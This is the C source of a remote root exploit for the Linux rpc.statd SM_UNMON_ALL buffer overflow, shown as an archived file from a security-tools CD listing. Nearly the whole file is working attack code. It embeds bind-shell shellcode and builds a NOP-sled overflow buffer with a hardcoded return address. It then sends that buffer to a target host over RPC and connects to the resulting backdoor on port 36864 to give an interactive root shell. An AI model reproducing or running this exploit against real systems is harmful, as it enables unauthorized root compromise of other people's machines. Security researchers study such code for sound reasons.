home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / linstatex.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  5.7 KB  |  253 lines
  1. /*
  2.  *   -> PRIVATE. DO NOT USE. DO NOT DISTRIBUTE. <-
  3.  *
  4.  *  linstatex.c
  5.  *  December 28, 1999
  6.  *  Remote root overflow for linux rpc.statd SM_UNMON_ALL vulnerability.
  7.  *
  8.  *  statd-0.2.4.tar.gz from http://www.kr.kernel.org/pub/linux/daemons/statd/
  9.  *
  10.  *  
  11.  */
  12.  
  13. #include <stdio.h>
  14. #include <stdlib.h>
  15. #include <unistd.h>
  16. #include <ctype.h>
  17. #include <string.h>
  18. #include <memory.h>
  19. #include <sys/types.h>
  20. #include <sys/socket.h>
  21. #include <sys/time.h>
  22. #include <netinet/in.h>
  23. #include <arpa/inet.h>
  24. #include <netdb.h>
  25. #include <rpc/rpc.h>
  26. #include <rpcsvc/sm_inter.h>
  27. #include <rpcsvc/sm_inter_xdr.c>
  28. #include <rpcsvc/sm_inter_clnt.c>
  29.  
  30. #define PROG        100024
  31. #define VERS        0x01
  32. #define PROC        0x04           /* SM_UNMON_ALL */
  33. #define BD_PORT        36864
  34. #define ADDR        0xbffff104
  35. #define RETPOS        989
  36. #define MR_NAME        "elite"
  37.  
  38. char c0de[] =
  39. "\xeb\x49\x5e\x29\xc0\x29\xdb\x40\x89\x46\x04\x40\x89\x06\xb0\x06\x89\x46\x08"
  40. "\xb0\x66\x43\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x90\x66\x89"
  41. "\x46\x0e\x8d\x46\x0c\x89\x46\x04\x29\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
  42. "\x66\x43\xcd\x80\x29\xc0\x40\x89\x46\x04\xb3\x04\xb0\x66\xcd\x80\xeb\x02\xeb"
  43. "\x4c\x29\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\x43\xcd\x80\x88\xc3\x29\xc9\xb0"
  44. "\x3f\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\xb8\x2e\x62\x69\x6e\x40"
  45. "\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46\x04\x29\xc0\x88\x46\x07\x89\x76\x08"
  46. "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x29\xc0\x40\xcd"
  47. "\x80\xe8\x64\xff\xff\xff";
  48.  
  49. u_long
  50. resolve_host(u_char *host_name)
  51. {
  52.     struct in_addr addr;
  53.     struct hostent *host_ent;
  54.     
  55.     addr.s_addr = inet_addr(host_name);
  56.     if (addr.s_addr == -1)
  57.     {
  58.     host_ent = gethostbyname(host_name);
  59.     if (!host_ent) return(0);
  60.     memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  61.     }
  62.     
  63.     return(addr.s_addr);
  64. }
  65.  
  66. void
  67. reclamation(u_long dst_ip)
  68. {
  69.     struct sockaddr_in sin;
  70.     u_char sock_buf[4096];
  71.     fd_set fds;
  72.     int sock;
  73.     
  74.     usleep(15000);
  75.     sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  76.     if (sock == -1)
  77.     {
  78.     perror("socket allocation");
  79.     exit(-1);
  80.     }
  81.     
  82.     sin.sin_family = AF_INET;
  83.     sin.sin_port   = htons(BD_PORT);
  84.     sin.sin_addr.s_addr = dst_ip;
  85.     
  86.     if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  87.     {
  88.     perror("connecting to backdoor");
  89.     close(sock);
  90.     exit(-1);
  91.     }
  92.     
  93.     fprintf(stderr, "owned\n");
  94.     for (;;)
  95.     {
  96.     FD_ZERO(&fds);
  97.     FD_SET(0, &fds);  /* STDIN_FILENO */
  98.     FD_SET(sock, &fds);
  99.     
  100.     if (select(255, &fds, NULL, NULL, NULL) == -1)
  101.     {
  102.         perror("select");
  103.         close(sock);
  104.         exit(-1);
  105.     }
  106.     
  107.     memset(sock_buf, 0, sizeof(sock_buf));
  108.     
  109.     if (FD_ISSET(sock, &fds))
  110.     {
  111.         if (recv(sock, sock_buf, sizeof(sock_buf), 0) == -1)
  112.         {
  113.         fprintf(stderr, "Connection closed by foreign host.\n");
  114.         close(sock);
  115.         exit(0);
  116.         }
  117.         
  118.         fprintf(stderr, "%s", sock_buf);
  119.     }
  120.     
  121.     if (FD_ISSET(0, &fds))
  122.     {
  123.         read(0, sock_buf, sizeof(sock_buf));
  124.         write(sock, sock_buf, strlen(sock_buf));
  125.     }
  126.     }
  127.     
  128.     /* NOTREACHED */
  129. }
  130.  
  131. static u_char *
  132. overflow_buf(u_int offset)
  133. {
  134.     static u_char buf[4096];
  135.     u_long addr    = ADDR + offset;
  136.     u_int  retpos  = RETPOS;
  137.     int i = 0, j = 0;
  138.     
  139.     memset(buf, 0x90, sizeof(buf));
  140.     
  141.     for (i = retpos - strlen(c0de); i < retpos; j++, i++)
  142.     {
  143.     buf[i] = c0de[j];
  144.     }
  145.     
  146.     for (; i < retpos + 4; i += 4)
  147.     {
  148.         buf[i+0] = (addr & 0xff);
  149.         buf[i+1] = (addr >> 8) & 0xff;
  150.         buf[i+2] = (addr >> 16) & 0xff;
  151.         buf[i+3] = (addr >> 24) & 0xff;
  152.     }
  153.     
  154.     buf[i] = 0;
  155.     memset(buf + i, 0, sizeof(buf) - i);
  156.     
  157.     return(buf);
  158. }
  159.  
  160. void
  161. exploit(u_long dst_ip, u_int offset)
  162. {
  163.     struct sockaddr_in sin;
  164.     struct sm_stat_res stat_res;
  165.     struct mon mon_req;
  166.     struct timeval time_val;
  167.     CLIENT *clnt;
  168.     int sock = RPC_ANYSOCK;
  169.     
  170.     time_val.tv_usec  = 0;
  171.     time_val.tv_sec   = 10;
  172.     
  173.     memset(&sin, 0, sizeof(struct sockaddr_in));
  174.     sin.sin_family = AF_INET;
  175.     sin.sin_addr.s_addr = dst_ip;
  176.     
  177.     clnt = clntudp_create(&sin, PROG, VERS, time_val, &sock);
  178.     if (!clnt)
  179.     {
  180.     fprintf(stderr, "err: clntudp_create(): is host running statd?\n");
  181.     exit(-1);
  182.     }
  183.     
  184.     memset(&mon_req, 0, sizeof(struct mon));
  185.     mon_req.mon_id.my_id.my_prog  = PROG;
  186.     mon_req.mon_id.my_id.my_vers  = VERS;
  187.     mon_req.mon_id.my_id.my_proc  = PROC;
  188.     mon_req.mon_id.my_id.my_name  = MR_NAME;
  189.     mon_req.mon_id.mon_name       = overflow_buf(offset);
  190.     mon_req.priv[0]               = '/';
  191.     
  192.     if (clnt_call(clnt, PROC, (xdrproc_t)xdr_mon, &mon_req.mon_id, 
  193.          (xdrproc_t)xdr_sm_stat_res, &stat_res, time_val) 
  194.             != RPC_SUCCESS)
  195.     {
  196.     usleep(10000);
  197.     clnt_destroy(clnt);
  198.     reclamation(dst_ip);
  199.     }
  200.     
  201.     fprintf(stderr, "clnt_call() succeeded: is the daemon patched?\n");
  202.     clnt_destroy(clnt);
  203.     exit(0);
  204. }
  205.  
  206. void
  207. usage(u_char *nomenclature)
  208. {
  209.     fprintf(stderr, "usage:\t%s dst_host|ip [-o offset]\n", nomenclature);
  210.     exit(0);
  211. }
  212.  
  213. int
  214. main(int argc, char **argv)
  215. {
  216.     struct in_addr iaddr;
  217.     u_long dst_ip  = 0;
  218.     u_int offset   = 0;
  219.     char opt;
  220.     
  221.     fprintf(stderr, "linstatex.c -- Linux rpc.statd SM_UNMON_ALL remote root overflow\n");
  222.     if (argc < 2)
  223.     {
  224.     usage(argv[0]);
  225.     /* NOTREACHED */
  226.     }
  227.     
  228.     dst_ip = resolve_host(argv[1]);
  229.     if (!dst_ip)
  230.     {
  231.     fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
  232.     exit(-1);
  233.     }
  234.     
  235.     while ((opt = getopt(argc, argv, "o:")) != EOF)
  236.     {
  237.     switch(opt)
  238.     {
  239.         case 'o':
  240.         offset = (u_int)atoi(optarg);
  241.         break;
  242.         default:
  243.         usage(argv[0]);
  244.         /* NOTREACHED */
  245.     }
  246.     }
  247.     
  248.     iaddr.s_addr = dst_ip;
  249.     fprintf(stderr, "Attacking target `%s`..\n", inet_ntoa(iaddr));
  250.     exploit(dst_ip, offset);
  251.     /* NOTREACHED */
  252. }
  253. /*                   www.hack.co.za   [28 September 2000]*/